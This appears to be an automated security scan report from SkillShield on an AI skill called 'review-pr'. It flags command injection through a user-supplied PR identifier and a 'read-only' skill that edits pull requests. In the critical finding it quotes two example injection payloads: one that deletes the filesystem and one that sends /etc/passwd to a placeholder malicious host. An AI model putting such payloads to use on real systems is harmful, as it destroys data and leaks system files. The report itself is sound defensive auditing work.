Trust Assessment
review-pr received a trust score of 63/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 1 critical, 0 high, 1 medium, and 0 low severity. Key findings include Potential Command Injection via User-Provided PR Identifier, Contradictory Permissions: 'Read-Only' Skill Performs Write Operation.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Static Code Analysis layer scored lowest at 63/100, indicating areas for improvement.
Last analyzed on February 18, 2026 (commit b62bd290). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Potential Command Injection via User-Provided PR Identifier The skill explicitly states that it will 'Ask for PR number or URL' from the user. This user-provided input, represented by `<PR>`, is then directly interpolated into multiple shell commands without apparent sanitization. This creates a critical command injection vulnerability. A malicious user could provide input like `123; rm -rf /` or `123 && curl http://malicious.com?data=$(cat /etc/passwd)` to execute arbitrary commands or exfiltrate data. All user-provided inputs used in shell commands must be rigorously sanitized or properly escaped. Consider using a dedicated library for shell argument escaping (e.g., `shlex.quote` in Python) or passing the PR identifier as an environment variable to the script, ensuring the script itself handles it safely. Alternatively, validate the input strictly to ensure it's a valid PR number or URL before use. | Static | SKILL.md:15 | |
| MEDIUM | Contradictory Permissions: 'Read-Only' Skill Performs Write Operation The skill's 'Safety' section explicitly states 'Never push, merge, or modify code intended to keep' and the 'Guardrails' section reiterates 'Keep review read-only'. However, step 3 of the 'Steps' section includes the command `gh pr edit <PR> --add-assignee "$gh_user"`. This command modifies the GitHub Pull Request by assigning a reviewer, directly contradicting the stated read-only nature and 'never modify' instructions. This discrepancy can lead to confusion about the skill's actual capabilities and could be exploited if the skill's scope is later expanded or if the LLM is prompted to perform other modifications. Align the skill's stated safety guidelines with its actual execution. Either remove the `gh pr edit` command to strictly adhere to a read-only policy, or update the 'Safety' and 'Guardrails' sections to accurately reflect that the skill performs limited modifications to PR metadata (e.g., 'Read-only with limited PR metadata modification'). | Static | SKILL.md:45 |
Scan History
Embed Code
[](https://skillshield.io/report/d8b58e381109333d)
Powered by SkillShield